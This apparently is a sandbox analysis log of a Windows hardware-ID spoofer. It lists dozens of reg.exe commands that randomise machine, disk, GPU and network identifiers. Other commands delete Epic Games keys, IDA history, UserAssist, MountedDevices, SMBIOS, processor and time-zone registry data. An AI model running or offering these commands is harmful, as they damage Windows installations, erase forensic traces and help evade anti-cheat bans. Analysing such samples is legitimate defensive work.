    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Modifies registry key
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:560
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Modifies registry key
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Enumerates system info in registry
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:240
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1944
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-12112-19706-2221932087} /f
      4⤵
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-12112-19706-2221932087} /f
      4⤵
      PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-12112 /f
      4⤵
      Modifies registry key
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:1624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 12112 /f
      4⤵
      Modifies registry key
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:1456
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 12112 /f
      4⤵
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1444
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-12112 /f
      4⤵
      Modifies registry key
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&1
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple12112-19706-22219-3208714440} /f
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:692
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple12112-19706-22219-3208714440} /f
      4⤵
      Modifies registry key
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:760
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 12112 /f
      4⤵
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 12112 /f
      4⤵
      Modifies registry key
      PID:1944
    - - C:\Windows\system32\reg.exe
        
        REG delete HKCU\Software\Epic Games /f
        5⤵
        
        PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 12112 /f
      4⤵
      Modifies registry key
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:1964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 12112-19706-22219-32087 /f
      4⤵
      PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
    3⤵
    PID:1248
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple12112-19706-22219-32087 /f
      4⤵
      Modifies registry key
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple12112 /f
      4⤵
      Modifies registry key
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:560
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 12115 /f
      4⤵
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 12115 /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f
    3⤵
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple12115-30455-7316-23382} /f
      4⤵
      Modifies registry key
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:240
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f
    3⤵
    PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
      4⤵
      Modifies registry key
      PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
      4⤵
      Modifies registry key
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:1624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 12115-30455-7316-2338224755 /f
      4⤵
      Modifies registry key
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:1456
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:1444
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      Modifies registry key
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:692
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:760
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      Modifies registry key
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:1964
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:1248
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      Modifies registry key
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:560
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-12115-30455-731623382 /f
      4⤵
      Modifies registry key
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-12115-30455-731623382 /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-12115-30455-731623382 /f
      4⤵
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:240
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      Modifies registry key
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1944
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-12115-30455-731623382 /f
      4⤵
      Modifies registry key
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-12115-30455-731623382 /f
      4⤵
      PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-12115-30455-731623382 /f
      4⤵
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:1624
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:1456
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:1444
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:692
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:760
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      Modifies registry key
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 121188435251801467723012706312323235562871027872256331897 /f
      4⤵
      Modifies registry class
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-12118-8435-2518014677 /f
      4⤵
      Modifies registry key
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-12118-8435-2518014677 /f
      4⤵
      PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1248
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-12118-8435-2518014677 /f
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:560
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-12118-8435-2518014677 /f
      4⤵
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-12118-8435-2518014677 /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:2016
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      Modifies registry key
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:240
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:1944
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      Modifies registry key
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      Modifies registry key
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:1624
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      Modifies registry key
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:1456
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      Modifies registry key
      PID:1100
    - - C:\Windows\system32\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 121188435251801467723012706312323235562871027872256331897 /f
        5⤵
        Modifies registry key
        
        PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:1444
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:692
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      Modifies registry key
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
    3⤵
    PID:760
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
      4⤵
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
      4⤵
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
      4⤵
      PID:2000
- - C:\Windows\system32\cmd.exe
